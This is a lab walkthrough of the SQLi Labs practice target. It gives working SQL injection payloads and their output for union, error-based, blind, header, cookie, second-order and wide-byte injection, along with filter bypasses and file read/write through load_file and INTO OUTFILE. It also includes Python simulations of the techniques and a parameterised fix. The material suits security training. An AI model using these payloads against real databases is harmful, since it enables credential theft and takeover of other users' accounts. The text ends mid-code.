SQLi Labs

Environment #

Set up the SQLi Labs target quickly with Docker (project: https://github.com/Audi-1/sqli-labs):

docker run -dt --name sqli-lab -p 50080:80 acgpiano/sqli-labs:latest

After deployment, open http://localhost:50080/ and click "Setup/reset Database for labs" once to initialize the database.

Tips #

information_schema #

information_schema is a database that ships with MySQL and holds metadata about every schema, table and column; the following can be read from it.

Get all databases

select group_concat(schema_name) from information_schema.schemata

Get the current database

select database()

Get all tables in the current database

select group_concat(table_name) from information_schema.tables where table_schema = database()

Get all columns of a given table

select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'users'

Get the data in a table (group_concat() output is cut off at group_concat_max_len, 1024 bytes by default, so long dumps have to be paged with limit)

select group_concat(id,':',username,':',password) from users

Comments #

Three comment styles:

  • #: the comment text follows directly, e.g. #this is a comment; in a GET parameter it must be sent as %23, otherwise the browser treats it as a URL fragment
  • --: must be followed by a space, e.g. -- this is a comment; in a URL the + of --+ is decoded to that space
  • /**/: may span lines, e.g. /*this is a comment*/

The purpose of the comment: once the injected input has changed the original SQL, it lets the statement still close correctly by commenting out whatever the application appends after the parameter (here LIMIT 0,1).

File operations #

Read a file (requires the FILE privilege, and secure_file_priv must be empty or point at the file's directory)

select load_file('/etc/passwd')

Write a file (same restrictions; the mysqld process also needs write access to the directory, and INTO OUTFILE refuses to overwrite an existing file)

select * from user into outfile '/tmp/zqqtest'

DUAL is a dummy table that exists only to complete the syntax where a FROM clause is required.

limit 0,1 and limit 1 offset 0 both return the first row.

Precedence #

AND binds tighter than OR (AND has precedence over OR), so a OR b AND c is parsed as a OR (b AND c).

Error-based #

extractvalue/updatexml raise an error when the XPath expression passed to them is invalid, and the error message quotes the offending expression. The leading 0x7e (~) makes the concatenated value an invalid XPath, so the subquery result is carried out in the error text. The message is truncated to 32 characters, so longer values have to be paged with substr().

select 1 and (extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))));

select 1 and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),3));

The goal in each Less below is to get the data in the users table of the current database.

Page-1 (Basic Challenges) #

Less-1 GET - Error based - Single quotes - String #

"Error based" here means the page prints the SQL error, which tells you how the original literal is closed; combined with union select, the data is then read from the page output.

Less-1/?id=-1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-1'' LIMIT 0,1' at line 1

Less-1/?id=-1' order by 3 -- +
Less-1/?id=-1' order by 4 -- +
Unknown column '4' in 'order clause'

Less-1/?id=-1' union select 1,2,3 -- +
Welcome    Dhakkan
Your Login name:2
Your Password:3

Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = database() -- +
Welcome    Dhakkan
Your Login name:emails,referers,uagents,users
Your Password:3

Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = database() and table_name = 'users' -- +
Welcome    Dhakkan
Your Login name:id,username,password
Your Password:3

Less-1/?id=-1' union select 1,group_concat(id,':',username,':',password,'<br>'),3 from users -- +
Welcome    Dhakkan
Your Login name:1:Dumb:Dumb
,2:Angelina:I-kill-you
,3:Dummy:p@ssword
,4:secure:crappy
,5:stupid:stupidity
,6:superman:genious
,7:batman:mob!le
,8:admin:admin
,9:admin1:admin1
,10:admin2:admin2
,11:admin3:admin3
,12:dhakkan:dumbo
,14:admin4:admin4

Your Password:3

Less-2 GET - Error based - Integer based #

Less-2/?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1

Less-2/?id=-1 order by 3 -- +
Less-2/?id=-1 order by 4 -- +
Unknown column '4' in 'order clause'

Less-2/?id=-1 union select 1,2,3 -- +
Welcome    Dhakkan
Your Login name:2
Your Password:3

The rest is the same as above.

Less-3 GET - Error based - Single quotes with twist - string #

Less-3/?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1

Less-3/?id=-1') union select 1,2,3 -- +
Welcome    Dhakkan
Your Login name:2
Your Password:3

The rest is the same as above.

Less-4 GET - Error based - Double quotes - String #

Less-4/?id=1"
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

Less-4/?id=-1") union select 1,2,3 -- +
Welcome    Dhakkan
Your Login name:2
Your Password:3

Less-5 GET - Double injection - Single quotes - String #

"Double injection" here refers to Double Query Injection, i.e. a statement of the form

select 
    count(*),
    concat((select database()), floor(rand() * 2)) as x        
from users 
group by x;

This triggers Duplicate entry '...' for key 'group_key', and the duplicated key carries the extra data out in the error message. It works because rand(0) is seeded, so floor(rand(0)*2) always produces the same sequence (0, 1, 1, 0, 1, 1, ...), while MySQL computes the GROUP BY key once to look it up in its temporary table and again when it inserts a new group; with three or more source rows the re-computed key collides with a group inserted a moment earlier. That is why the query runs over information_schema.tables (plenty of rows) and why the error is reliable.

Other methods are not considered for this lesson.
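The following Python model is an added example, not part of the lab or these notes: it replays the lookup-then-insert behaviour described above and shows why the trick needs a seeded rand(0) and at least three rows. The RAND0_BITS prefix is taken as given, and DuplicateEntry stands in for MySQL error 1062.

```python
import itertools
from typing import Dict, Optional

# First terms of floor(rand(0)*2) in MySQL: rand() with a fixed seed is
# deterministic, and this (0, 1, 1, ...) prefix is assumed here as given.
RAND0_BITS = (0, 1, 1, 0, 1, 1)


class DuplicateEntry(Exception):
    """Stands in for MySQL error 1062, Duplicate entry '...' for key 'group_key'."""


def simulate_group_by(leaked: str, row_count: int) -> Dict[str, int]:
    """Model of SELECT count(*), concat(<leaked>, floor(rand(0)*2)) AS x
    FROM <table with row_count rows> GROUP BY x.

    Assumption modelled: the grouping key is computed once to look the group
    up in the temporary table and, if it is absent, computed *again* when the
    new group is inserted. Returns the group counts on success and raises
    DuplicateEntry(key) when the re-computed key is already present."""
    bits = itertools.cycle(RAND0_BITS)
    groups: Dict[str, int] = {}
    for _ in range(row_count):
        key = leaked + str(next(bits))          # evaluation 1: lookup
        if key in groups:
            groups[key] += 1
            continue
        key = leaked + str(next(bits))          # evaluation 2: insert
        if key in groups:
            raise DuplicateEntry(key)           # the key, and so <leaked>, leaks
        groups[key] = 1
    return groups


def error_message(leaked: str, row_count: int = 3) -> Optional[str]:
    """The text the page would show, or None when the query simply succeeds."""
    try:
        simulate_group_by(leaked, row_count)
    except DuplicateEntry as exc:
        return f"Duplicate entry '{exc.args[0]}' for key 'group_key'"
    return None


if __name__ == "__main__":
    print(error_message("security", 2))   # two rows: no error
    print(error_message("security", 3))   # three rows: the leak
```

With two source rows the first row inserts the group security1 and the second row finds it, so nothing collides; the third row looks up security0, misses, re-computes security1 on insert and hits the duplicate key.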

Less-5/?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

Less-5/?id=-1' union select 1,2,3 -- +
Welcome    Dhakkan
You are in...........

# Database name
Less-5/?id=1' union select 1,count(*),concat((select database()),floor(rand(0)*2))as a from information_schema.tables group by a --+

# Table names
Less-5/?id=1' union select count(*),2,(concat((select concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2)))as x from information_schema.tables group by x -- +
Welcome    Dhakkan
Subquery returns more than 1 row

Less-5/?id=0' union select count(*),2,(concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)))as x from information_schema.tables group by x -- +
Welcome    Dhakkan
Duplicate entry 'emails1' for key 'group_key'

Less-5/?id=0' union select count(*),2,(concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 1,1),floor(rand(0)*2)))as x from information_schema.tables group by x -- +
Welcome    Dhakkan
Duplicate entry 'referers1' for key 'group_key'

Less-5/?id=0' union select count(*),2,(concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 2,1),floor(rand(0)*2)))as x from information_schema.tables group by x -- +
Welcome    Dhakkan
Duplicate entry 'uagents1' for key 'group_key'

Less-5/?id=0' union select count(*),2,(concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 3,1),floor(rand(0)*2)))as x from information_schema.tables group by x -- +
Duplicate entry 'users1' for key 'group_key'

# Column names
?id=0' union select count(*),2,(concat((select concat(column_name) from information_schema.columns where table_schema=database() and table_name = 'users' limit 0,1),floor(rand(0)*2)))as x from information_schema.tables group by x -- +
Welcome    Dhakkan
Duplicate entry 'id1' for key 'group_key'

?id=0' union select count(*),2,(concat((select concat(column_name) from information_schema.columns where table_schema=database() and table_name = 'users' limit 1,1),floor(rand(0)*2)))as x from information_schema.tables group by x -- +
Welcome    Dhakkan
Duplicate entry 'username1' for key 'group_key'

?id=0' union select count(*),2,(concat((select concat(column_name) from information_schema.columns where table_schema=database() and table_name = 'users' limit 2,1),floor(rand(0)*2)))as x from information_schema.tables group by x -- +
Welcome    Dhakkan
Duplicate entry 'password1' for key 'group_key'

# Data
?id=0' union select count(*),2,(concat((select concat(id,':',username,':',password) from users limit 0,1),floor(rand(0)*2)))as x from information_schema.tables group by x -- +
Welcome    Dhakkan
Duplicate entry '1:Dumb:Dumb1' for key 'group_key'

# Remaining rows omitted

Less-6 GET - Double injection - Double quotes - String #

Less-6/?id=1"
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"" LIMIT 0,1' at line 1

# Database name
Less-6/?id=1" union select 1,count(*),concat((select database()),floor(rand(0)*2))as a from information_schema.tables group by a --+
Welcome    Dhakkan
Duplicate entry 'security1' for key 'group_key'

# The rest is the same as above

Less-7 GET - Dump into file - String #

For this lesson you first have to enter the container and run chmod -R 777 /var/www/html (a lab-only shortcut: the mysql user must be able to write into the web root), otherwise MySQL fails with a permission error. secure_file_priv is already permissive in this image.

ERROR 1 (HY000): Can't create/write to file '/var/www/html/test.txt' (Errcode: 13)
Less-7/?id=1'
Welcome    Dhakkan
You have an error in your SQL syntax

Less-7/?id=1')) --+
Welcome    Dhakkan
You are in.... Use outfile......

Less-7/?id=1')) order by 4 --+
Welcome    Dhakkan
You have an error in your SQL syntax

Less-7/?id=-1')) union select 1,2,database() into outfile  '/var/www/html/test.txt' --+
Welcome    Dhakkan
You have an error in your SQL syntax

The page still reports an error because SELECT ... INTO OUTFILE returns no rows to display, but the file has been written (a second run with the same path fails, since INTO OUTFILE never overwrites an existing file):

http://localhost:50080/test.txt
1	2	security

# The rest omitted

Less-8 GET - Blind - Boolean Based - Single Quotes #

Less-8/?id=1' --+
Welcome    Dhakkan
You are in...........

# Database name
Less-8/?id=1' AND ASCII(SUBSTRING((SELECT database()), 1, 1)) = 115 --+
Welcome    Dhakkan
You are in...........

Less-8/?id=1' AND ASCII(SUBSTRING((SELECT database()), 8, 1)) = 121 --+
Welcome    Dhakkan
You are in...........

# Table names
Less-8/?id=1' AND ASCII(SUBSTRING((SELECT group_concat(table_name) from information_schema.tables where table_schema=database()), 1, 1)) = 101 --+
Welcome    Dhakkan
You are in...........

# Column names
Less-8/?id=1' AND ASCII(SUBSTRING((SELECT group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'), 1 , 1)) = 105 --+
Welcome    Dhakkan
You are in...........

# Data
Less-8/?id=1' AND ASCII(SUBSTRING((SELECT concat(id,':',username,':',password) from users limit 0,1), 1, 1)) = 49 --+
Welcome    Dhakkan
You are in...........

Every guess costs one request, so this is done with Burp Suite Intruder (or a script) rather than by hand.

Less-9 GET - Blind - Time Based - Single Quotes #

Less-9/?id=1'
Welcome    Dhakkan
You are in...........

Less-9/?id=1 and SLEEP(2) --+   # no delay: without the closing quote this is all still inside the string literal
Welcome    Dhakkan
You are in...........

Less-9/?id=1' and SLEEP(2) --+   # the response now takes 2 seconds

Less-9/?id=1' and IF(ASCII(SUBSTRING((SELECT database()), 1, 1)) = 114, SLEEP(5), NULL) --+

Less-9/?id=1' and IF(ASCII(SUBSTRING((SELECT database()), 1, 1)) = 115, SLEEP(5), NULL) --+

The rest is the same as above.

Less-10 GET - Blind - Time Based - Double Quotes #

Less-10/?id=1

Less-10/?id=1"

Less-10/?id=1" and SLEEP(5) --+

The rest is the same as above.

Less-11 POST - Error Based - Single Quotes - String #

"Error based" has the same meaning as in Less-1: the page prints the SQL error, which reveals how the literal is closed; union select then reads the data through the page output.

passwd=123'&submit=Submit&uname=zqq
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''123'' LIMIT 0,1' at line 1

passwd=23' order by 2 --+&submit=Submit&uname=zqq

passwd=23' order by 3 --+&submit=Submit&uname=zqq
Unknown column '3' in 'order clause'

passwd=23' union select 1,2 --+&submit=Submit&uname=zqq
Your Login name:1
Your Password:2

passwd=23' union select database(),2 --+&submit=Submit&uname=zqq
Your Login name:security
Your Password:2

passwd=23' union select group_concat(table_name),2 from information_schema.tables where table_schema=database() --+&submit=Submit&uname=zqq
Your Login name:emails,referers,uagents,users
Your Password:2

passwd=23' union select group_concat(column_name),2 from information_schema.columns where table_schema=database() and table_name = 'users' --+&submit=Submit&uname=zqq
Your Login name:id,username,password
Your Password:2

passwd=23' union select group_concat(id,':',username,':',password,'<br>'),2 from users --+&submit=Submit&uname=zqq
Your Login name:1:Dumb:Dumb
,2:Angelina:I-kill-you
,3:Dummy:p@ssword
,4:secure:crappy
,5:stupid:stupidity
,6:superman:genious
,7:batman:mob!le
,8:admin:admin
,9:admin1:admin1
,10:admin2:admin2
,11:admin3:admin3
,12:dhakkan:dumbo
,14:admin4:admin4

Your Password:2

Less-12 POST - Error Based - Double Quotes - String - with twist #

passwd=1"&submit=Submit&uname=zqq
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

passwd=123") order by 3 --+&submit=Submit&uname=zqqq
Unknown column '3' in 'order clause'

passwd=123") union select 1,2 --+&submit=Submit&uname=zqq
Your Login name:1
Your Password:2

Less-13 POST - Double Injection - Single Quotes - String - with twist #

passwd=123'&submit=Submit&uname=zqq
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''123'') LIMIT 0,1' at line 1

passwd=123') union select count(*),concat((select database()),floor(rand(0)*2))as a from information_schema.tables group by a --+&submit=Submit&uname=zqq
Duplicate entry 'security1' for key 'group_key'

passwd=123') union select count(*),(concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)))as x from information_schema.tables group by x -- +&submit=Submit&uname=zqq
Duplicate entry 'emails1' for key 'group_key'

Less-14 POST - Double Injection - Double Quotes - String #

passwd=123"&submit=Submit&uname=zqq
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"123"" LIMIT 0,1' at line 1

passwd=123" union select count(*),concat((select database()),floor(rand(0)*2))as a from information_schema.tables group by a --+&submit=Submit&uname=zqq
Duplicate entry 'security1' for key 'group_key'

passwd=123" union select count(*),(concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)))as x from information_schema.tables group by x -- +&submit=Submit&uname=zqq
Duplicate entry 'emails1' for key 'group_key'

Less-15 POST - Blind - Boolean Based - Single Quotes - String #

passwd=123' or sleep(2) --+&submit=Submit&uname=zqq

passwd=123' or IF(ASCII(SUBSTRING((SELECT database()), 1, 1)) = 115, SLEEP(5), NULL) --+&submit=Submit&uname=zqq

The rest is the same as above.

Less-16 POST - Blind - Boolean Based - Double Quotes - String #

passwd=123") or sleep(2) --+&submit=Submit&uname=zqq

passwd=123") or IF(ASCII(SUBSTRING((SELECT database()), 1, 1)) = 115, SLEEP(5), NULL) --+&submit=Submit&uname=zqq

The rest is the same as above.

Less-17 POST - Update Query - Error Based - String #

passwd=123'&submit=Submit&uname=Dhakkan
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'dhakkan'' at line 1

passwd=123';select 1--+&submit=Submit&uname=Dhakkan
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select 1-- ' WHERE username='dhakkan'' at line 1


passwd=123' and '1'='1&submit=Submit&uname=Dhakkan
passwd=123' and '1'='1'--+&submit=Submit&uname=Dhakkan

passwd=123' and (select 1 from (select count(*),concat((select database()),floor(rand(0)*2))as a from information_schema.tables group by a)) --+&submit=Submit&uname=Dhakkan
Every derived table must have its own alias

passwd=123' and (select 1 from (select count(*),concat((select database()),floor(rand(0)*2))as a from information_schema.tables group by a)b) --+&submit=Submit&uname=Dhakkan
Duplicate entry 'security1' for key 'group_key'

passwd=123' and (select 1 from (select count(*),(concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)))as a from information_schema.tables group by a)b) --+&submit=Submit&uname=Dhakkan
Duplicate entry 'emails1' for key 'group_key'

The rest is the same as above.

Less-18 POST - Header Injection - Uagent field - Error Based #

You can first reset the password via Less-17 so that a normal login works.

passwd=123&submit=Submit&uname=Dhakkan
Your User Agent is: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36

User-Agent:
' + extractvalue(1,concat(0x7e,(select database()),0x7e)) +'
XPATH syntax error: '~security~'

' + extractvalue(1,concat(0x7e,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),0x7e)) +'
XPATH syntax error: '~emails~'

' + extractvalue(1,concat(0x7e,(select concat(column_name) from information_schema.columns where table_schema=database() and table_name = 'users' limit 1,1),0x7e)) +'
XPATH syntax error: '~username~'

' + extractvalue(1,concat(0x7e,(select concat(username,':',password) from users limit 4,1),0x7e)) +'
XPATH syntax error: '~stupid:1~'

Less-19 POST - Header Injection - Referer field - Error Based #

passwd=123&submit=Submit&uname=Dhakkan
Your Referer is: http://localhost:50080/Less-19/

Referer:
' + extractvalue(1,concat(0x7e,(select database()),0x7e)) +'
XPATH syntax error: '~security~'

The rest is the same as above.

Less-20 POST - Cookie Injection - Error Based - string #

Cookie:
uname=dhakkan'
Issue with your mysql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''dhakkan'' LIMIT 0,1' at line 1

uname=' union select 1,2,3 --+
Your Login name:2
Your Password:3
Your ID:1

# This one echoes the data; the rest is the same as above

Page-2 (Advanced Injections) #

Less-21 POST - Cookie Injection - Error Based - complex - string #

Cookie:
1234') union select 1,2,3 limit 0,1 -- +  # the cookie value has to be base64-encoded

# The rest is the same as above

Less-22 POST - Cookie Injection - Error Based - Double Quotes - string #

Cookie:
1234" union select 1,2,3 limit 0,1 -- +  # the cookie value has to be base64-encoded

# The rest is the same as above

Less-23 Get - Error based - strip comments #

?id=-1' union select 1,2,3 '
Your Login name:2
Your Password:3

# The rest is the same as above; the statement is closed with the application's own trailing quote instead of a comment

Less-24 Second Degree Injection #

Reading the source, the following places build SQL statements. login.php:

function sqllogin(){

   $username = mysql_real_escape_string($_POST["login_user"]);
   $password = mysql_real_escape_string($_POST["login_password"]);
   $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
   $res = mysql_query($sql) or die('You tried to be real smart, Try harder!!!! :( ');
   $row = mysql_fetch_row($res);
   //print_r($row) ;
   if ($row[1]) {
      return $row[1];
   } else {
      return 0;
   }
}

login-create.php:

$sql = "select count(*) from users where username='$username'";
$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
$row = mysql_fetch_row($res);

$sql = "insert into users ( username, password) values(\"$username\", \"$pass\")";

pass-change.php:

$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);

$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');

The goal here: first register a specially crafted user, then use the password-change feature. At registration the quote is escaped, so the INSERT itself is safe, but the raw username (quote and comment marker included) is what gets stored; pass-change.php then takes $_SESSION["username"] from that stored value and concatenates it without escaping, so the username is injected a second time and can change another user's password (e.g. admin's). The statement exploited is

$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";

Registering the username admin'# is enough: after logging in as that user, changing the password produces UPDATE users SET PASSWORD='...' where username='admin'#' and password='...', which updates admin and skips the current-password check entirely.
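An added simulation of that flow in SQLite (example code, not the lab's PHP): registration escapes the quote, the raw username is stored, and the password change concatenates the session username unescaped. SQLite has no # comment, so the payload used here is admin'-- (with a trailing space) instead of the lab's admin'#; the table rows are constructed, and change_password_fixed shows the parameterised form.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed users table (two rows taken from the page's dump)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "admin"), ("Dumb", "Dumb")])
    return conn


def escape(s: str) -> str:
    """Plays the role of mysql_real_escape_string(): the quote is neutralised
    for this one statement only. SQLite doubles quotes where MySQL backslashes
    them; either way the value that reaches the table is the raw string."""
    return s.replace("'", "''")


def register(conn, username: str, password: str) -> None:
    """login-create.php: the input is escaped, so this INSERT is safe in itself."""
    conn.execute(
        f"INSERT INTO users (username, password) VALUES ('{escape(username)}', '{escape(password)}')"
    )


def change_password(conn, session_username: str, current: str, new: str) -> int:
    """pass-change.php: $_SESSION["username"] was read back from the database,
    is trusted, and is concatenated without escaping. Returns rows updated."""
    sql = (f"UPDATE users SET password='{escape(new)}' "
           f"WHERE username='{session_username}' AND password='{escape(current)}'")
    return conn.execute(sql).rowcount


def change_password_fixed(conn, session_username: str, current: str, new: str) -> int:
    """Same operation with bound parameters: the stored username is data, not SQL."""
    sql = "UPDATE users SET password=? WHERE username=? AND password=?"
    return conn.execute(sql, (new, session_username, current)).rowcount


def password_of(conn, username: str) -> str:
    return conn.execute("SELECT password FROM users WHERE username=?", (username,)).fetchone()[0]


def second_order_attack(fixed: bool = False) -> str:
    """Register the crafted user, log in as it (the session username is the
    stored raw value) and change its "own" password; return admin's password."""
    conn = make_db()
    # Lab payload is admin'# ; SQLite only knows -- comments, hence this variant.
    attacker = "admin'-- "
    register(conn, attacker, "123")
    change = change_password_fixed if fixed else change_password
    change(conn, attacker, "123", "pwned")
    return password_of(conn, "admin")


if __name__ == "__main__":
    print(second_order_attack())            # pwned
    print(second_order_attack(fixed=True))  # admin
```

The vulnerable UPDATE becomes UPDATE users SET password='pwned' WHERE username='admin'-- ' AND password='123': the rest of the WHERE clause is commented away and admin's row is rewritten without knowing admin's current password. With bound parameters the same input only touches the attacker's own row.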

Less-25 Error based - Trick with OR & AND #

preg_replace('/or/i',"",$id);
preg_replace('/AND/i',"",$id);

This can be bypassed by doubling up the keyword, e.g. oorr and anandd.
Less-25/?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

Less-25/?id=-1' or '1'='1' --+
Hint: Your Input is Filtered with following result: -1' '1'='1' --

Less-25/?id=-1' oror '1'='1' --+
Hint: Your Input is Filtered with following result: -1' '1'='1' --

Less-25/?id=-1' oorr '1'='1' --+
Your Login name:Dumb
Your Password:Dumb
Hint: Your Input is Filtered with following result: -1' or '1'='1' -- # the replacement is a single pass with no re-scan, so the inner "or" survives
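Added example (not the lab's code): the single-pass filter exactly as Less-25 applies it, next to a fixed-point variant that keeps stripping until nothing changes, under which the doubled keyword collapses to nothing instead of to the keyword.

```python
import re

# Less-25 blacklist as shown in the lab source: preg_replace('/or/i') then '/AND/i'.
BLACKLIST = ("or", "and")


def filter_once(s: str) -> str:
    """What Less-25 does: every occurrence is removed, but the result is not
    re-scanned, so "oorr" becomes "or" and "anandd" becomes "and"."""
    for kw in BLACKLIST:
        s = re.sub(kw, "", s, flags=re.IGNORECASE)
    return s


def filter_fixed_point(s: str) -> str:
    """Strip until the input stops changing, which defeats the doubling trick.
    It is still a blacklist (|| and && are untouched, as is mixed spacing);
    prepared statements remain the real fix."""
    while True:
        stripped = filter_once(s)
        if stripped == s:
            return s
        s = stripped


if __name__ == "__main__":
    print(filter_once("-1' oorr '1'='1' -- "))         # -1' or '1'='1' --
    print(filter_fixed_point("-1' oorr '1'='1' -- "))  # -1'  '1'='1' --
```

The side effect on column names is the same in both directions: password contains "or", which is why the payload above has to spell it passwoorrd to survive one pass.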

Less-25/?id=-1' union select 1,group_concat(id,':',username,':',passwoorrd, '<br>'),3 from users limit 0,1 --+ 
Your Login name:1:Dumb:Dumb
,2:Angelina:I-kill-you
,3:Dummy:p@ssword
,4:secure:crappy
,5:stupid:stupidity
,6:superman:genious
,7:batman:mob!le
,8:admin:123
,9:admin1:admin1
,10:admin2:admin2
,11:admin3:admin3
,12:dhakkan:123
,14:admin4:admin4
,15:zqq:123
,16:zqq':123
,17:zqq":123
,18:admin'#:123

Your Password:3

Less-25a Blind based - Trick with OR & AND #

"Blind" here means there is no error message to tell you how the literal is closed.

Less-25a/?id=-1 oorr '1'='1' --+
Your Login name:Dumb
Your Password:Dumb

Less-25a/?id=-1 union select 1,group_concat(id,':',username,':',passwoorrd, '<br>'),3 from users limit 0,1 --+ 
Your Login name:1:Dumb:Dumb
,2:Angelina:I-kill-you
,3:Dummy:p@ssword
,4:secure:crappy
,5:stupid:stupidity
,6:superman:genious
,7:batman:mob!le
,8:admin:123
,9:admin1:admin1
,10:admin2:admin2
,11:admin3:admin3
,12:dhakkan:123
,14:admin4:admin4
,15:zqq:123
,16:zqq':123
,17:zqq":123
,18:admin'#:123

Your Password:3

Less-26 Error based - Trick with comments and space #

Less-26/?id=0'%a0oorr%a0'1'='1 # %a0 stands in for the stripped space, and the statement is closed with the application's trailing quote instead of a comment
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''0'' LIMIT 0,1' at line 1

Less-26/?id=0'%a0union%a0select%a01,database(),'3

# The rest is the same as above

Less-26a Blind based - Trick with comments and space - Blind #

Less-26a/?id=0'%a0oorr%a0'1'='1

Less-26a/?id=0')%a0union%a0select%a01,database(),('3
Your Login name:security
Your Password:3

# The rest is the same as above

Less-27 Error based - Trick with SELECT & UNION - Single quotes #

Less-27/?id=0'%a0or%a0'1'='1
Your Login name:Dumb
Your Password:Dumb

# union can be bypassed by doubling it up, but for some reason select could not; mixed case gets past the filter
Less-27/?id=0'%a0uunionnion%a0SeLect%a01,2,'3
Your Login name:2
Your Password:3

# The rest is the same as above

Less-27a Blind based - Trick with SELECT & UNION - Dobule quotes #

Less-27a/?id=0"%a0or%a0"1"="1
Your Login name:Dumb
Your Password:Dumb

Less-27a/?id=0"%a0uunionnion%a0SeLect%a01,2,"3
Your Login name:2
Your Password:3

# The rest is the same as above

Less-28 Error based - Trick with SELECT & UNION - Single quotes with parenthesis #

Less-28/?id=0')%a0or%a0('1'='1
Your Login name:Dumb
Your Password:Dumb

Less-28/?id=0')%a0union%a0SeLect%a01,2,('3
Your Login name:2
Your Password:3

Less-28a Blind based - Trick with SELECT & UNION - Single quotes with parenthesis #

# Same as above, only without the error echo

Less-29 Error based - Protection with WAF - Single quotes #

No WAF is visible in the Docker image; the hint is merely URL-encoded. (In the original lab, Less-29 to 31 place a Tomcat front end in front of Apache and the intended bypass is HTTP parameter pollution, i.e. a second id= parameter that the two servers resolve differently; the Docker image only ships the PHP side.)

Less-29/?id=0'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''0'' LIMIT 0,1' at line 1

Less-29/?id=0' union select 1,2,'3
Your Login name:2
Your Password:3

Less-29/?id=0' union select 1,database(),'3
Your Login name:security
Your Password:3

Less-29/?id=0' union select 1,group_concat(username,':',password,'<br>'),3 from users where '1'='1
Your Login name:Dumb:Dumb
,Angelina:I-kill-you
,Dummy:p@ssword
,secure:crappy
,stupid:stupidity
,superman:genious
,batman:mob!le
,admin:123
,admin1:admin1
,admin2:admin2
,admin3:admin3
,dhakkan:123
,admin4:admin4
,zqq:123
,zqq':123
,zqq":123
,admin'#:123

Your Password:3

Less-30 Blind based - Protection with WAF - Double quotes #

Less-30/?id=0" union select 1,database(),"3
Your Login name:security
Your Password:3

# The rest is the same as above

Less-31 Blind based - Protection with WAF - Double quotes with parenthesis #

Less-31/?id=0") union select 1,database(),("3
Your Login name:security
Your Password:3

# The rest is the same as above

Less-32 Bypass addslashes() #

Wide-byte injection: addslashes() turns ' into \' (bytes 0x5c 0x27), but when the connection charset is GBK the 0xdf byte sent before the quote pairs with 0x5c to form one two-byte character, so the backslash is consumed and the quote is left live.

Less-32/?id=-1%df' union select 1,2,3 --+
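Added example, not the lab's code: what addslashes() produces for %df' and how the same bytes read under GBK versus UTF-8. PAYLOAD is constructed from the request above, and build_query mirrors the Less-32 query shape.

```python
# Constructed payload: the bytes PHP receives for ?id=-1%df' union select 1,2,3 --+
PAYLOAD = b"-1\xdf' union select 1,2,3 -- "


def addslashes(data: bytes) -> bytes:
    """PHP addslashes() on raw bytes: a backslash before ' " and \\, NUL as \\0.
    It is byte-oriented and knows nothing about the connection charset."""
    out = bytearray()
    for b in data:
        if b == 0:
            out += b"\\0"
        elif b in b"'\"\\":
            out += bytes([0x5C, b])
        else:
            out.append(b)
    return bytes(out)


def build_query(raw_id: bytes) -> bytes:
    """Less-32 shape: $id = addslashes($_GET['id']); SELECT ... WHERE id='$id' LIMIT 0,1"""
    return b"SELECT * FROM users WHERE id='" + addslashes(raw_id) + b"' LIMIT 0,1"


def as_seen_by_mysql(query: bytes, charset: str) -> str:
    """Decode the bytes the way the server does for that connection charset.
    Under GBK, 0xdf 0x5c is one two-byte character, so the backslash that
    addslashes() inserted is swallowed and the quote after it is live; under
    UTF-8 the lone 0xdf is invalid and the backslash stays in front of the quote."""
    return query.decode(charset, errors="replace")


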